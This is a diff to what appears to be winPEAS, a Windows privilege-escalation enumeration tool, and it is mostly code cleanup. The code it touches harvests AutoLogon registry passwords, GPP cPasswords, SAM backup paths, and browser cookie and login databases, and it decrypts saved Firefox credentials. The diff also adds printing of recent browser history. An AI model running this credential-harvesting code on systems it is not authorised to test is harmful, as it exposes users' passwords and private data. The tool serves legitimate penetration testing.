-        }        
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/Info/UserInfo/SAM/SamServer.cs

@@ -2,7 +2,6 @@
 using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
-using winPEAS.Helpers;
 using winPEAS.Native;
 using winPEAS.Native.Classes;
 
@@ -99,9 +98,9 @@ namespace winPEAS.Info.UserInfo.SAM
                 yield return us.ToString();
                 us.Buffer = IntPtr.Zero; // we don't own this one
             }
-        }               
+        }
+
 
-       
 
         private static void Check(NTSTATUS err)
         {

winPEAS/winPEASexe/winPEAS/Info/UserInfo/SID2GroupNameHelper.cs

@@ -2,7 +2,6 @@
 using System.Collections.Generic;
 using System.Net.NetworkInformation;
 using System.Security.Principal;
-using System.Text.RegularExpressions;
 using winPEAS.Helpers;
 
 namespace winPEAS.Info.UserInfo

winPEAS/winPEASexe/winPEAS/Info/UserInfo/Tenant/Tenant.cs

@@ -3,7 +3,6 @@ using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using System.Security.Cryptography.X509Certificates;
 using System.Text;
-using winPEAS.Helpers;
 using winPEAS.Native;
 using winPEAS.Native.Structs;
 

winPEAS/winPEASexe/winPEAS/Info/UserInfo/Token/Enums.cs

@@ -1,7 +1,7 @@
 using System;
 
 namespace winPEAS.Info.UserInfo.Token
-{  
+{
     [Flags]
     public enum LuidAttributes : uint
     {

winPEAS/winPEASexe/winPEAS/Info/UserInfo/Token/Token.cs

@@ -10,7 +10,7 @@ using winPEAS.Native.Enums;
 namespace winPEAS.Info.UserInfo.Token
 {
     internal static class Token
-    {  
+    {
         public static Dictionary<string, string> GetTokenGroupPrivs()
         {
             // Returns all privileges that the current process/user possesses
@@ -36,7 +36,7 @@ namespace winPEAS.Info.UserInfo.Token
                         Advapi32.LookupPrivilegeName(null, luidPointer, null, ref luidNameLen);
                         strBuilder.EnsureCapacity(luidNameLen + 1);
                         if (Advapi32.LookupPrivilegeName(null, luidPointer, strBuilder, ref luidNameLen))
-                            results[strBuilder.ToString()] = $"{(LuidAttributes) laa.Attributes}";
+                            results[strBuilder.ToString()] = $"{(LuidAttributes)laa.Attributes}";
                         Marshal.FreeHGlobal(luidPointer);
                     }
                 }

winPEAS/winPEASexe/winPEAS/Info/UserInfo/User.cs

@@ -7,7 +7,6 @@ using System.Management;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
 using winPEAS.Helpers;
-using winPEAS.KnownFileCreds;
 using winPEAS.Native;
 using winPEAS.Native.Structs;
 
@@ -18,7 +17,7 @@ namespace winPEAS.Info.UserInfo
         public static List<string> GetMachineUsers(bool onlyActive, bool onlyDisabled, bool onlyLockout, bool onlyAdmins, bool fullInfo)
         {
             List<string> retList = new List<string>();
-            
+
             try
             {
                 foreach (ManagementObject user in Checks.Checks.Win32Users)
@@ -107,7 +106,7 @@ namespace winPEAS.Info.UserInfo
                 }
             }
             catch
-            { 
+            {
                 //If error, then some error ocurred trying to find a user inside an unexistant domain, check if local user
                 user = GetUserLocal(sUserName);
             }

winPEAS/winPEASexe/winPEAS/Info/UserInfo/UserInfoHelper.cs

@@ -6,7 +6,6 @@ using System.Windows.Forms;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 using winPEAS.Info.UserInfo.SAM;
-using winPEAS.KnownFileCreds;
 using winPEAS.Native;
 using winPEAS.Native.Enums;
 
@@ -14,12 +13,12 @@ using winPEAS.Native.Enums;
 //I have also created the folder Costura32 and Costura64 with the respective Dlls of Colorful.Console
 
 namespace winPEAS.Info.UserInfo
-{    
+{
     class UserInfoHelper
     {
         // https://stackoverflow.com/questions/5247798/get-list-of-local-computer-usernames-in-windows
-        
+
-  
+
         public static string SID2GroupName(string SID)
         {
             //Frist, look in well-known SIDs
@@ -84,13 +83,13 @@ namespace winPEAS.Info.UserInfo
                 Beaprint.PrintException(ex.Message);
             }
             return groupName;
-        }       
+        }
 
         public static PrincipalContext GetPrincipalContext()
         {
             PrincipalContext oPrincipalContext = new PrincipalContext(ContextType.Machine);
             return oPrincipalContext;
-        }       
+        }
 
         //From Seatbelt
         public enum WTS_CONNECTSTATE_CLASS
@@ -106,7 +105,7 @@ namespace winPEAS.Info.UserInfo
             Down,
             Init
         }
-       
+
         public static void CloseServer(IntPtr ServerHandle)
         {
             Wtsapi32.WTSCloseServer(ServerHandle);
@@ -145,7 +144,7 @@ namespace winPEAS.Info.UserInfo
             [MarshalAs(UnmanagedType.LPStr)]
             public String pFarmName;
         }
-       
+
         public static IntPtr OpenServer(String Name)
         {
             IntPtr server = Wtsapi32.WTSOpenServer(Name);
@@ -215,7 +214,7 @@ namespace winPEAS.Info.UserInfo
             }
             return results;
         }
-       
+
         // https://stackoverflow.com/questions/31464835/how-to-programmatically-check-the-password-must-meet-complexity-requirements-g
         public static List<Dictionary<string, string>> GetPasswordPolicy()
         {
@@ -247,18 +246,19 @@ namespace winPEAS.Info.UserInfo
                 Beaprint.GrayPrint(string.Format("  [X] Exception: {0}", ex));
             }
             return results;
-        }                      
+        }
-                          
+
         public static Dictionary<string, string> GetAutoLogon()
         {
-            Dictionary<string, string> results = new Dictionary<string, string>();
+            Dictionary<string, string> results = new Dictionary<string, string>
-
+            {
-            results["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName");
+                ["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName"),
-            results["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName");
+                ["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName"),
-            results["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword");
+                ["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword"),
-            results["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName");
+                ["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName"),
-            results["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName");
+                ["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName"),
-            results["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword");
+                ["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword")
+            };
             return results;
         }
 
@@ -281,7 +281,7 @@ namespace winPEAS.Info.UserInfo
                     c = $"{Clipboard.GetFileDropList()}";
 
                 //else if (Clipboard.ContainsImage()) //No system.Drwing import
-                    //c = string.Format("{0}", Clipboard.GetImage());
+                //c = string.Format("{0}", Clipboard.GetImage());
             }
             catch (Exception ex)
             {

winPEAS/winPEASexe/winPEAS/Info/WindowsCreds/RDPServerSettings.cs

@@ -29,6 +29,6 @@
             AllowSmartCardRedirection = allowSmartCardRedirection;
             BlockPnPDeviceRedirection = blockPnPDeviceRedirection;
             BlockPrinterRedirection = blockPrinterRedirection;
-        }       
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/InterestingFiles/GPP.cs

@@ -15,7 +15,7 @@ namespace winPEAS.InterestingFiles
 
             try
             {
-                string allUsers = System.Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
+                string allUsers = Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
 
                 if (!allUsers.Contains("ProgramData"))
                 {
@@ -225,11 +225,13 @@ namespace winPEAS.InterestingFiles
                         Changed = "[BLANK]";
                     }
 
-                    results[file] = new Dictionary<string, string>();
+                    results[file] = new Dictionary<string, string>
-                    results[file]["UserName"] = UserName;
+                    {
-                    results[file]["NewName"] = NewName;
+                        ["UserName"] = UserName,
-                    results[file]["cPassword"] = cPassword;
+                        ["NewName"] = NewName,
-                    results[file]["Changed"] = Changed;
+                        ["cPassword"] = cPassword,
+                        ["Changed"] = Changed
+                    };
                 }
             }
             catch (Exception ex)

winPEAS/winPEASexe/winPEAS/InterestingFiles/InterestingFiles.cs

@@ -9,9 +9,9 @@ using winPEAS.Helpers.Search;
 namespace winPEAS.InterestingFiles
 {
     internal static class InterestingFiles
-    {              
+    {
         public static List<string> GetSAMBackups()
-        { 
+        {
             //From SharpUP
             var results = new List<string>();
 
@@ -28,7 +28,7 @@ namespace winPEAS.InterestingFiles
                     $@"{systemRoot}\System32\config\RegBack\SYSTEM",
                 };
 
-                results.AddRange(searchLocations.Where(searchLocation => System.IO.File.Exists(searchLocation)));
+                results.AddRange(searchLocations.Where(searchLocation => File.Exists(searchLocation)));
             }
             catch (Exception ex)
             {
@@ -40,7 +40,7 @@ namespace winPEAS.InterestingFiles
         public static List<string> GetLinuxShells()
         {
             var results = new List<string>();
-           
+
             try
             {
                 string drive = Environment.GetEnvironmentVariable("SystemDrive");
@@ -90,7 +90,7 @@ namespace winPEAS.InterestingFiles
                 Beaprint.GrayPrint("Error: " + ex);
             }
             return results;
-        }       
+        }
 
         public static List<Dictionary<string, string>> GetRecycleBin()
         {
@@ -102,7 +102,7 @@ namespace winPEAS.InterestingFiles
                 // Reference: https://stackoverflow.com/questions/18071412/list-filenames-in-the-recyclebin-with-c-sharp-without-using-any-external-files
                 int lastDays = 30;
 
-                var startTime = System.DateTime.Now.AddDays(-lastDays);
+                var startTime = DateTime.Now.AddDays(-lastDays);
 
                 // Shell COM object GUID
                 Type shell = Type.GetTypeFromCLSID(new Guid("13709620-C279-11CE-A49E-444553540000"));

winPEAS/winPEASexe/winPEAS/InterestingFiles/Unattended.cs

@@ -40,7 +40,7 @@ namespace winPEAS.InterestingFiles
 
             try
             {
-                var winDir = System.Environment.GetEnvironmentVariable("windir");
+                var winDir = Environment.GetEnvironmentVariable("windir");
                 string[] searchLocations =
                 {
                     $"{winDir}\\sysprep\\sysprep.xml",
@@ -56,7 +56,7 @@ namespace winPEAS.InterestingFiles
                     $"{winDir}\\..\\unattend.inf",
                 };
 
-                results.AddRange(searchLocations.Where(System.IO.File.Exists));
+                results.AddRange(searchLocations.Where(File.Exists));
             }
             catch (Exception ex)
             {

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/BrowserBase.cs

@@ -10,7 +10,7 @@ namespace winPEAS.KnownFileCreds.Browsers
         public abstract string Name { get; }
         public abstract IEnumerable<CredentialModel> GetSavedCredentials();
         public abstract void PrintInfo();
-       
+
 
         public virtual void PrintSavedCredentials()
         {

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Chrome/Chrome.cs

@@ -1,6 +1,7 @@
 using System;
 using System.Collections.Generic;
 using System.IO;
+using System.Linq;
 using System.Text.RegularExpressions;
 using System.Web.Script.Serialization;
 using winPEAS.Checks;
@@ -27,7 +28,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
             {
                 Beaprint.MainPrint("Looking for Chrome DBs");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                Dictionary<string, string> chromeDBs = Chrome.GetChromeDbs();
+                Dictionary<string, string> chromeDBs = GetChromeDbs();
 
                 if (chromeDBs.ContainsKey("userChromeCookiesPath"))
                 {
@@ -59,7 +60,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
             {
                 Beaprint.MainPrint("Looking for GET credentials in Chrome history");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                Dictionary<string, List<string>> chromeHistBook = Chrome.GetChromeHistBook();
+                Dictionary<string, List<string>> chromeHistBook = GetChromeHistBook();
                 List<string> history = chromeHistBook["history"];
                 List<string> bookmarks = chromeHistBook["bookmarks"];
 
@@ -77,8 +78,11 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
                             Beaprint.AnsiPrint("    " + url, colorsB);
                         }
                     }
-
                     Console.WriteLine();
+
+                    int limit = 50;
+                    Beaprint.MainPrint($"Chrome history -- limit {limit}\n");
+                    Beaprint.ListPrint(history.Take(limit).ToList());
                 }
                 else
                 {
@@ -130,14 +134,14 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
                 else
                 {
                     string userChromeCookiesPath =
-                        $"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
+                        $"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
                     if (File.Exists(userChromeCookiesPath))
                     {
                         results["userChromeCookiesPath"] = userChromeCookiesPath;
                     }
 
                     string userChromeLoginDataPath =
-                        $"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
+                        $"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
                     if (File.Exists(userChromeLoginDataPath))
                     {
                         results["userChromeLoginDataPath"] = userChromeLoginDataPath;
@@ -156,7 +160,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
             List<string> results = new List<string>();
 
             // parses a Chrome history file via regex
-            if (System.IO.File.Exists(path))
+            if (File.Exists(path))
             {
                 Regex historyRegex = new Regex(@"(http|ftp|https|file)://([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])?");
 
@@ -217,10 +221,10 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
                 }
                 else
                 {
-                    string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", Environment.GetEnvironmentVariable("USERPROFILE"));
                     results["history"] = ParseChromeHistory(userChromeHistoryPath);
 
-                    string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", Environment.GetEnvironmentVariable("USERPROFILE"));
 
                     results["bookmarks"] = ParseChromeBookmarks(userChromeBookmarkPath);
                 }
@@ -241,7 +245,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
             {
                 try
                 {
-                    string contents = System.IO.File.ReadAllText(path);
+                    string contents = File.ReadAllText(path);
 
                     // reference: http://www.tomasvera.com/programming/using-javascriptserializer-to-parse-json-objects/
                     JavaScriptSerializer json = new JavaScriptSerializer();

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/FFDecryptor.cs

@@ -9,9 +9,9 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
     /// Firefox helper class
     /// </summary>
     static class FFDecryptor
-    {        
+    {
         static IntPtr NSS3;
-        
+
         [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
         public delegate long DLLFunctionDelegate(string configdir);
 

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/FFLogins.cs

@@ -1,10 +1,4 @@
-using System;
+namespace winPEAS.KnownFileCreds.Browsers.Firefox
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
-
-namespace winPEAS.KnownFileCreds.Browsers.Firefox
 {
     class FFLogins
     {

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs

@@ -4,11 +4,11 @@ using System.Data;
 using System.IO;
 using System.Linq;
 using System.Text.RegularExpressions;
+using System.Web.Script.Serialization;
+using winPEAS._3rdParty.SQLite;
 using winPEAS.Checks;
 using winPEAS.Helpers;
 using winPEAS.KnownFileCreds.Browsers.Models;
-using winPEAS._3rdParty.SQLite;
-using System.Web.Script.Serialization;
 
 namespace winPEAS.KnownFileCreds.Browsers.Firefox
 {
@@ -29,7 +29,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
             {
                 Beaprint.MainPrint("Looking for Firefox DBs");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                List<string> firefoxDBs = Firefox.GetFirefoxDbs();
+                List<string> firefoxDBs = GetFirefoxDbs();
                 if (firefoxDBs.Count > 0)
                 {
                     foreach (string firefoxDB in firefoxDBs) //No Beaprints because line needs red
@@ -56,21 +56,26 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
             {
                 Beaprint.MainPrint("Looking for GET credentials in Firefox history");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                List<string> firefoxHist = Firefox.GetFirefoxHistory();
+                List<string> history = GetFirefoxHistory();
-                if (firefoxHist.Count > 0)
+                if (history.Count > 0)
                 {
                     Dictionary<string, string> colorsB = new Dictionary<string, string>()
                     {
                         { Globals.PrintCredStrings, Beaprint.ansi_color_bad },
                     };
 
-                    foreach (string url in firefoxHist)
+                    foreach (string url in history)
                     {
                         if (MyUtils.ContainsAnyRegex(url.ToUpper(), Browser.CredStringsRegex))
                         {
                             Beaprint.AnsiPrint("    " + url, colorsB);
                         }
                     }
+                    Console.WriteLine();
+
+                    int limit = 50;
+                    Beaprint.MainPrint($"Firefox history -- limit {limit}\n");
+                    Beaprint.ListPrint(history.Take(limit).ToList());
                 }
                 else
                 {
@@ -101,7 +106,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
                         if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                         {
                             string userFirefoxBasePath = $"{dir}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\";
-                            if (System.IO.Directory.Exists(userFirefoxBasePath))
+                            if (Directory.Exists(userFirefoxBasePath))
                             {
                                 var directories = Directory.EnumerateDirectories(userFirefoxBasePath);
                                 foreach (string directory in directories)
@@ -249,25 +254,28 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
 
                 foreach (string dir in dirs)
                 {
-                    string[] files = Directory.EnumerateFiles(dir, "signons.sqlite").ToArray();
+                    if (Directory.Exists(dir))
-                    if (files.Length > 0)
                     {
-                        signonsFile = files[0];
+                        string[] files = Directory.EnumerateFiles(dir, "signons.sqlite").ToArray();
-                        signonsFound = true;
+                        if (files.Length > 0)
-                    }
+                        {
+                            signonsFile = files[0];
+                            signonsFound = true;
+                        }
 
-                    // find &quot;logins.json"file
+                        // find &quot;logins.json"file
-                    files = Directory.EnumerateFiles(dir, "logins.json").ToArray();
+                        files = Directory.EnumerateFiles(dir, "logins.json").ToArray();
-                    if (files.Length > 0)
+                        if (files.Length > 0)
-                    {
+                        {
-                        loginsFile = files[0];
+                            loginsFile = files[0];
-                        loginsFound = true;
+                            loginsFound = true;
-                    }
+                        }
 
-                    if (loginsFound || signonsFound)
+                        if (loginsFound || signonsFound)
-                    {
+                        {
-                        FFDecryptor.NSS_Init(dir);
+                            FFDecryptor.NSS_Init(dir);
-                        break;
+                            break;
+                        }
                     }
 
                 }
@@ -313,8 +321,8 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
 
                     foreach (Browsers.Firefox.LoginData loginData in ffLoginData.logins)
                     {
-                        string username = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedUsername);
+                        string username = FFDecryptor.Decrypt(loginData.encryptedUsername);
-                        string password = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedPassword);
+                        string password = FFDecryptor.Decrypt(loginData.encryptedPassword);
                         logins.Add(new CredentialModel
                         {
                             Username = username,
@@ -325,9 +333,9 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
                 }
             }
             catch (Exception e)
-            {                
+            {
             }
-            
+
             return logins;
         }
     }

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/IBrowser.cs

@@ -5,7 +5,7 @@ namespace winPEAS.KnownFileCreds.Browsers
 {
     internal interface IBrowser
     {
-        string Name { get;  }
+        string Name { get; }
         void PrintInfo();
         IEnumerable<CredentialModel> GetSavedCredentials();
     }

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/InternetExplorer.cs

@@ -1,11 +1,11 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Checks;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
@@ -30,7 +30,7 @@ namespace winPEAS.KnownFileCreds.Browsers
             {
                 Beaprint.MainPrint("Current IE tabs");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                List<string> urls = InternetExplorer.GetCurrentIETabs();
+                List<string> urls = GetCurrentIETabs();
 
                 Dictionary<string, string> colorsB = new Dictionary<string, string>()
                 {
@@ -51,9 +51,9 @@ namespace winPEAS.KnownFileCreds.Browsers
             {
                 Beaprint.MainPrint("Looking for GET credentials in IE history");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                Dictionary<string, List<string>> chromeHistBook = InternetExplorer.GetIEHistFav();
+                Dictionary<string, List<string>> ieHistoryBook = GetIEHistFav();
-                List<string> history = chromeHistBook["history"];
+                List<string> history = ieHistoryBook["history"];
-                List<string> favorites = chromeHistBook["favorites"];
+                List<string> favorites = ieHistoryBook["favorites"];
 
                 if (history.Count > 0)
                 {
@@ -69,8 +69,15 @@ namespace winPEAS.KnownFileCreds.Browsers
                             Beaprint.AnsiPrint("    " + url, colorsB);
                         }
                     }
-
                     Console.WriteLine();
+
+                    int limit = 50;
+                    Beaprint.MainPrint($"IE history -- limit {limit}\n");
+                    Beaprint.ListPrint(history.Take(limit).ToList());
+                }
+                else
+                {
+                    Beaprint.NotFoundPrint();
                 }
 
                 Beaprint.MainPrint("IE favorites");
@@ -91,7 +98,7 @@ namespace winPEAS.KnownFileCreds.Browsers
                 { "favorites", new List<string>() },
             };
 
-            DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
+            DateTime startTime = DateTime.Now.AddDays(-lastDays);
 
             try
             {
@@ -167,39 +174,31 @@ namespace winPEAS.KnownFileCreds.Browsers
                     {
                         foreach (KeyValuePair<string, object> kvp in settings)
                         {
-                            byte[] timeBytes = RegistryHelper.GetRegValueBytes("HKCU", "SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLsTime", kvp.Key.ToString().Trim());
+                            results["history"].Add(kvp.Value.ToString().Trim());
-                            if (timeBytes != null)
-                            {
-                                long timeLong = (long)(BitConverter.ToInt64(timeBytes, 0));
-                                DateTime urlTime = DateTime.FromFileTime(timeLong);
-                                if (urlTime > startTime)
-                                {
-                                    results["history"].Add(kvp.Value.ToString().Trim());
-                                }
-                            }
                         }
                     }
 
-                    string userIEBookmarkPath = string.Format("{0}\\Favorites\\", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userIEBookmarkPath = string.Format("{0}\\Favorites\\", Environment.GetEnvironmentVariable("USERPROFILE"));
-
+                    if (Directory.Exists(userIEBookmarkPath))
-                    string[] bookmarkPaths = Directory.EnumerateFiles(userIEBookmarkPath, "*.url", SearchOption.AllDirectories).ToArray();
-
-                    foreach (string bookmarkPath in bookmarkPaths)
                     {
-                        using (StreamReader rdr = new StreamReader(bookmarkPath))
+                        string[] bookmarkPaths = Directory.EnumerateFiles(userIEBookmarkPath, "*.url", SearchOption.AllDirectories).ToArray();
+                        foreach (string bookmarkPath in bookmarkPaths)
                         {
-                            string line;
+                            using (StreamReader rdr = new StreamReader(bookmarkPath))
-                            string url = "";
-                            while ((line = rdr.ReadLine()) != null)
                             {
-                                if (line.StartsWith("URL=", StringComparison.InvariantCultureIgnoreCase))
+                                string line;
+                                string url = "";
+                                while ((line = rdr.ReadLine()) != null)
                                 {
-                                    if (line.Length > 4)
+                                    if (line.StartsWith("URL=", StringComparison.InvariantCultureIgnoreCase))
-                                        url = line.Substring(4);
+                                    {
-                                    break;
+                                        if (line.Length > 4)
+                                            url = line.Substring(4);
+                                        break;
+                                    }
                                 }
+                                results["favorites"].Add(url.ToString().Trim());
                             }
-                            results["favorites"].Add(url.ToString().Trim());
                         }
                     }
                 }
@@ -271,7 +270,7 @@ namespace winPEAS.KnownFileCreds.Browsers
         public override IEnumerable<CredentialModel> GetSavedCredentials()
         {
             // unsupported
-            var result = new List<CredentialModel>();           
+            var result = new List<CredentialModel>();
             return result;
         }
     }

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Kerberos/Enums.cs

@@ -1,7 +1,7 @@
 using System;
 
 namespace winPEAS.KnownFileCreds.Kerberos
-{ 
+{
     public enum KERB_ENCRYPTION_TYPE : UInt32
     {
         reserved0 = 0,

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Kerberos/Helpers.cs

@@ -29,7 +29,7 @@ namespace winPEAS.KnownFileCreds.Kerberos
             }
             catch (Exception e)
             {
-            }            
+            }
 
             return lsaHandle;
         }

winPEAS/winPEASexe/winPEAS/KnownFileCreds/KnownFileCredsInfo.cs

@@ -1,4 +1,5 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
@@ -6,14 +7,13 @@ using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Text;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
 namespace winPEAS.KnownFileCreds
 {
     static class KnownFileCredsInfo
-    {              
+    {
         public static Dictionary<string, object> GetRecentRunCommands()
         {
             Dictionary<string, object> results = new Dictionary<string, object>();
@@ -34,7 +34,7 @@ namespace winPEAS.KnownFileCreds
                 results = RegistryHelper.GetRegValues("HKCU", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU");
             }
             return results;
-        }       
+        }
 
         public static List<Dictionary<string, string>> ListCloudCreds()
         {
@@ -76,7 +76,7 @@ namespace winPEAS.KnownFileCreds
                 else
                 {
                     var currentUserDir = Environment.GetEnvironmentVariable("USERPROFILE");
-                    userDirs = new List<string>{ currentUserDir };
+                    userDirs = new List<string> { currentUserDir };
                 }
 
                 foreach (var userDir in userDirs)
@@ -107,7 +107,7 @@ namespace winPEAS.KnownFileCreds
                 DateTime lastModified = File.GetLastWriteTime(filePath);
                 long size = new FileInfo(filePath).Length;
 
-                results?.Add(new Dictionary<string, string> 
+                results?.Add(new Dictionary<string, string>
                 {
                     { "file", filePath },
                     { "Description", description },
@@ -123,7 +123,7 @@ namespace winPEAS.KnownFileCreds
             // parses recent file shortcuts via COM
             List<Dictionary<string, string>> results = new List<Dictionary<string, string>>();
             int lastDays = 7;
-            DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
+            DateTime startTime = DateTime.Now.AddDays(-lastDays);
 
             try
             {
@@ -145,31 +145,34 @@ namespace winPEAS.KnownFileCreds
                             string recentPath = string.Format("{0}\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", dir);
                             try
                             {
-                                string[] recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories).ToArray();
+                                if (Directory.Exists(recentPath))
-
-                                if (recentFiles.Length != 0)
                                 {
-                                    Console.WriteLine("   {0} :\r\n", userName);
+                                    string[] recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories).ToArray();
-                                    foreach (string recentFile in recentFiles)
+
+                                    if (recentFiles.Length != 0)
                                     {
-                                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
+                                        Console.WriteLine("   {0} :\r\n", userName);
-
+                                        foreach (string recentFile in recentFiles)
-                                        if (lastAccessed > startTime)
                                         {
-                                            // invoke the WshShell com object, creating a shortcut to then extract the TargetPath from
+                                            DateTime lastAccessed = File.GetLastAccessTime(recentFile);
-                                            Object shortcut = shellObj.GetType().InvokeMember("CreateShortcut", BindingFlags.InvokeMethod, null, shellObj, new object[] { recentFile });
-                                            Object TargetPath = shortcut.GetType().InvokeMember("TargetPath", BindingFlags.GetProperty, null, shortcut, new object[] { });
 
-                                            if (TargetPath.ToString().Trim() != "")
+                                            if (lastAccessed > startTime)
                                             {
-                                                results.Add(new Dictionary<string, string>()
+                                                // invoke the WshShell com object, creating a shortcut to then extract the TargetPath from
+                                                Object shortcut = shellObj.GetType().InvokeMember("CreateShortcut", BindingFlags.InvokeMethod, null, shellObj, new object[] { recentFile });
+                                                Object TargetPath = shortcut.GetType().InvokeMember("TargetPath", BindingFlags.GetProperty, null, shortcut, new object[] { });
+
+                                                if (TargetPath.ToString().Trim() != "")
+                                                {
+                                                    results.Add(new Dictionary<string, string>()
                                                 {
                                                     { "Target", TargetPath.ToString() },
                                                     { "Accessed", string.Format("{0}", lastAccessed) }
                                                 });
+                                                }
